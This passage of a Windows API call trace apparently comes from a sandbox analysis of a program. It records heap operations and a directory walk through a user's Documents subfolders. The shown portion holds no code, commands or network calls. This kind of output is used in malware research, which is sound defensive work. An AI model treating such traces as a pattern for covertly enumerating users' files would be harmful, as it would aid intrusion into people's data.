HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e690 | out: hHeap=0x620000) returned 1 [0237.608] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf5dc8a70, ftCreationTime.dwHighDateTime=0x1d5bdb1, ftLastAccessTime.dwLowDateTime=0x35219d30, ftLastAccessTime.dwHighDateTime=0x1d5b5ae, ftLastWriteTime.dwLowDateTime=0x35219d30, ftLastWriteTime.dwHighDateTime=0x1d5b5ae, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZLJLwY4 p8u", cAlternateFileName="ZLJLWY~1")) returned 1 [0237.608] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0237.608] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a7f8 [0237.608] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.608] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c44b0 [0237.608] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a2a8 [0237.608] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3b8f8b0 [0237.608] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8f838 | out: hHeap=0x620000) returned 1 [0237.608] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a660 | out: hHeap=0x620000) returned 1 [0237.608] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0237.608] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecb68 | out: hHeap=0x620000) returned 1 [0237.608] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a660 [0237.608] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a7f8 | out: hHeap=0x620000) returned 1 [0237.608] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0237.608] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf5dc8a70, ftCreationTime.dwHighDateTime=0x1d5bdb1, ftLastAccessTime.dwLowDateTime=0x35219d30, ftLastAccessTime.dwHighDateTime=0x1d5b5ae, ftLastWriteTime.dwLowDateTime=0x35219d30, ftLastWriteTime.dwHighDateTime=0x1d5b5ae, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZLJLwY4 p8u", cAlternateFileName="ZLJLWY~1")) returned 0 [0237.608] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0237.608] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18b0 | out: hHeap=0x620000) returned 1 [0237.608] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7caa0 | out: hHeap=0x620000) returned 1 [0237.608] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0237.608] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0237.608] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0237.608] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3b8f838 [0237.608] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.609] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.609] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8f838 | out: hHeap=0x620000) returned 1 [0237.609] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3b8f838 [0237.609] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.609] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.609] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8f838 | out: hHeap=0x620000) returned 1 [0237.609] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3b8f838 [0237.609] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.609] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.609] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8f838 | out: hHeap=0x620000) returned 1 [0237.609] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3b8f838 [0237.609] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.609] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.609] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8f838 | out: hHeap=0x620000) returned 1 [0237.609] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3b8f838 [0237.609] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.609] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.609] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8f838 | out: hHeap=0x620000) returned 1 [0237.609] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3b8f838 [0237.609] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0237.609] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.609] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8f838 | out: hHeap=0x620000) returned 1 [0237.609] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3b8f838 [0237.609] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.609] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0237.609] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.609] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0237.609] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8f838 | out: hHeap=0x620000) returned 1 [0237.609] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3b8f838 [0237.609] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.609] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.610] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8f838 | out: hHeap=0x620000) returned 1 [0237.610] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3b8f838 [0237.610] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0237.610] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.610] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8f838 | out: hHeap=0x620000) returned 1 [0237.610] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3b8f838 [0237.610] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0237.610] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0237.610] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8f838 | out: hHeap=0x620000) returned 1 [0237.610] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3b8f838 [0237.610] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0237.610] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0237.610] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8f838 | out: hHeap=0x620000) returned 1 [0237.610] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3b8f838 [0237.610] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.610] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.610] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8f838 | out: hHeap=0x620000) returned 1 [0237.610] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3b8f838 [0237.610] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.610] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.610] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8f838 | out: hHeap=0x620000) returned 1 [0237.610] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3b8f838 [0237.610] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0237.610] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.610] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8f838 | out: hHeap=0x620000) returned 1 [0237.610] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3b8f838 [0237.610] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0237.610] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.610] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8f838 | out: hHeap=0x620000) returned 1 [0237.610] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3b8f838 [0237.611] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.611] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.611] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8f838 | out: hHeap=0x620000) returned 1 [0237.611] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3b8f838 [0237.611] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.611] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.611] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8f838 | out: hHeap=0x620000) returned 1 [0237.611] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3b8f838 [0237.611] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.611] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.611] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8f838 | out: hHeap=0x620000) returned 1 [0237.611] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3b8f838 [0237.611] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.611] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.611] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8f838 | out: hHeap=0x620000) returned 1 [0237.611] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3b8f838 [0237.611] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.611] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.611] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8f838 | out: hHeap=0x620000) returned 1 [0237.611] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3b8f838 [0237.611] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.611] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.611] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8f838 | out: hHeap=0x620000) returned 1 [0237.611] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3b8f838 [0237.611] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.611] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.611] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8f838 | out: hHeap=0x620000) returned 1 [0237.611] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3b8f838 [0237.611] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.612] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0237.612] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.612] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0237.612] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8f838 | out: hHeap=0x620000) returned 1 [0237.612] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3b8f838 [0237.612] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.612] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.612] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8f838 | out: hHeap=0x620000) returned 1 [0237.612] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3b8f838 [0237.612] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.612] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0237.612] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.612] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0237.612] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8f838 | out: hHeap=0x620000) returned 1 [0237.612] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3b8f838 [0237.612] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0237.612] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0237.612] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8f838 | out: hHeap=0x620000) returned 1 [0237.612] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3b8f838 [0237.612] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0237.612] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0237.612] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8f838 | out: hHeap=0x620000) returned 1 [0237.612] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3b8f838 [0237.612] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.612] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.612] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8f838 | out: hHeap=0x620000) returned 1 [0237.612] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3b8f838 [0237.612] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.612] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.612] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8f838 | out: hHeap=0x620000) returned 1 [0237.613] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3b8f838 [0237.613] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.613] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0237.613] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.613] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0237.613] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8f838 | out: hHeap=0x620000) returned 1 [0237.613] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3b8f838 [0237.613] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0237.613] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.613] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8f838 | out: hHeap=0x620000) returned 1 [0237.613] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3b8f838 [0237.613] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0237.613] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.613] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8f838 | out: hHeap=0x620000) returned 1 [0237.613] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3b8f838 [0237.613] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.613] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.613] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8f838 | out: hHeap=0x620000) returned 1 [0237.613] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3b8f838 [0237.613] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.613] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.613] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8f838 | out: hHeap=0x620000) returned 1 [0237.613] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3b8f838 [0237.613] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.613] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.613] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8f838 | out: hHeap=0x620000) returned 1 [0237.613] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3b8f838 [0237.613] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.613] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.613] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8f838 | out: hHeap=0x620000) returned 1 [0237.614] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3b8f838 [0237.614] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.614] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.614] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8f838 | out: hHeap=0x620000) returned 1 [0237.614] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3b8f838 [0237.614] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.614] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.614] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8f838 | out: hHeap=0x620000) returned 1 [0237.614] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3b8f838 [0237.614] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\") returned="My Music\\" [0237.614] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0237.614] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0237.614] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0237.614] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0237.614] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0237.614] PathFindFileNameW (pszPath="") returned="" [0237.614] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf5dc8a70, ftCreationTime.dwHighDateTime=0x1d5bdb1, ftLastAccessTime.dwLowDateTime=0x35219d30, ftLastAccessTime.dwHighDateTime=0x1d5b5ae, ftLastWriteTime.dwLowDateTime=0x35219d30, ftLastWriteTime.dwHighDateTime=0x1d5b5ae, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZLJLwY4 p8u", cAlternateFileName="ZLJLWY~1")) returned 0xffffffff [0237.614] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8f838 | out: hHeap=0x620000) returned 1 [0237.615] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18b0 | out: hHeap=0x620000) returned 1 [0237.615] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0237.615] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0237.615] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0237.615] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\") returned="My Pictures\\" [0237.615] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0237.615] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0237.615] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0237.615] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0237.615] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0237.615] PathFindFileNameW (pszPath="") returned="" [0237.615] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf5dc8a70, ftCreationTime.dwHighDateTime=0x1d5bdb1, ftLastAccessTime.dwLowDateTime=0x35219d30, ftLastAccessTime.dwHighDateTime=0x1d5b5ae, ftLastWriteTime.dwLowDateTime=0x35219d30, ftLastWriteTime.dwHighDateTime=0x1d5b5ae, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZLJLwY4 p8u", cAlternateFileName="ZLJLWY~1")) returned 0xffffffff [0237.615] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8f838 | out: hHeap=0x620000) returned 1 [0237.615] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18b0 | out: hHeap=0x620000) returned 1 [0237.615] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0237.615] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0237.615] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0237.615] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned="My Shapes\\" [0237.615] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0237.615] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0237.615] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0237.615] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0237.615] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0237.616] PathFindFileNameW (pszPath="") returned="" [0237.616] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0237.616] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8f838 | out: hHeap=0x620000) returned 1 [0237.616] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0237.616] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, 